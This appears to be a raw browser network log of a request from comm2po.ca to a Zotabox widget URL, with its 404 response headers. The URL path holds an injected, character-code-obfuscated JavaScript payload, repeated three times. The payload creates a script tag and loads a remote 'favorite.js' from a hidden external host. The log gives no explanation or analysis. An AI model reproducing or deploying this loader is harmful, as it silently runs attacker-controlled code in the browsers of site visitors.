static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%2
0114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
104.22.54.216404 Not Found 0 B URL HTTP/2 static.zotabox.com/%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,
%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js
IP 104.22.54.216:0
GET /%3C///%3C/script%3E%3Cscript%3Eeval(String.fromCharCode(118,%2097,%20114,%2032,%20100,%2061,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2059,%20118,%2097,%20114,%2032,%20115,%2061,%20100,%2046,%2099,%20114,%20101,%2097,%20116,%20101,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%2040,%2039,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2041,%2059,%2032,%2010,%20115,%2046,%20116,%20121,%20112,%20101,%2061,%2039,%20116,%20101,%20120,%20116,%2047,%20106,%2097,%20118,%2097,%20115,%2099,%20114,%20105,%20112,%20116,%2039,%2059,%2010,%20115,%2046,%2097,%20115,%20121,%20110,%2099,%2061,%20116,%20114,%20117,%20101,%2059,%2010,%20118,%2097,%20114,%2032,%20112,%20108,%2032,%2061,%2032,%2083,%20116,%20114,%20105,%20110,%20103,%2046,%20102,%20114,%20111,%20109,%2067,%20104,%2097,%20114,%2067,%20111,%20100,%20101,%2040,%2049,%2048,%2052,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2054,%2044,%2032,%2049,%2049,%2050,%2044,%2032,%2049,%2049,%2053,%2044,%2032,%2053,%2056,%2044,%2032,%2052,%2055,%2044,%2032,%2052,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2049,%2049,%2048,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2056,%2044,%2032,%2049,%2048,%2056,%2044,%2032,%2057,%2055,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2048,%2055,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2057,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2049,%2052,%2044,%2032,%2049,%2048,%2048,%2044,%2032,%2057,%2055,%2044,%2032,%2049,%2048,%2051,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2052,%2054,%2044,%2032,%2057,%2057,%2044,%2032,%2049,%2049,%2049,%2044,%2032,%2049,%2048,%2057,%2041,%2059,%2010,%20115,%2046,%20115,%20114,%2099,%2061,%20112,%20108,%2043,%2039,%2047,%20102,%2097,%20118,%20111,%20114,%20105,%20116,%20101,%2046,%20106,%20115,%2063,%20116,%2061,%20116,%2038,%2039,%2059,%2032,%2010,%20105,%20102,%2032,%2040,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%2
0112,%20116,%2041,%2032,%20123,%2032,%2010,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2046,%20112,%2097,%20114,%20101,%20110,%20116,%2078,%20111,%20100,%20101,%2046,%20105,%20110,%20115,%20101,%20114,%20116,%2066,%20101,%20102,%20111,%20114,%20101,%2040,%20115,%2044,%2032,%20100,%20111,%2099,%20117,%20109,%20101,%20110,%20116,%2046,%2099,%20117,%20114,%20114,%20101,%20110,%20116,%2083,%2099,%20114,%20105,%20112,%20116,%2041,%2059,%2010,%20125,%2032,%20101,%20108,%20115,%20101,%2032,%20123,%2010,%20100,%2046,%20103,%20101,%20116,%2069,%20108,%20101,%20109,%20101,%20110,%20116,%20115,%2066,%20121,%2084,%2097,%20103,%2078,%2097,%20109,%20101,%2040,%2039,%20104,%20101,%2097,%20100,%2039,%2041,%2091,%2048,%2093,%2046,%2097,%20112,%20112,%20101,%20110,%20100,%2067,%20104,%20105,%20108,%20100,%2040,%20115,%2041,%2059,%2010,%20125));%3C/script%3E/widgets.js HTTP/1.1
Host: static.zotabox.com
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:96.0) Gecko/20100101 Firefox/96.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Connection: keep-alive
Referer: https://www.comm2po.ca/
Sec-Fetch-Dest: script
Sec-Fetch-Mode: no-cors
Sec-Fetch-Site: cross-site
HTTP/2 404 Not Found
date: Wed, 21 Sep 2022 04:23:39 GMT
content-type: text/html; charset=utf-8
vary: Accept-Encoding
x-powered-by: Zotabox
access-control-allow-origin: *
access-control-allow-methods: GET,POST
content-security-policy: default-src 'none'
x-content-type-options: nosniff
content-encoding: gzip
cf-cache-status: DYNAMIC
server: cloudflare
cf-ray: 74e006d55d7ab4ff-OSL
X-Firefox-Spdy: h2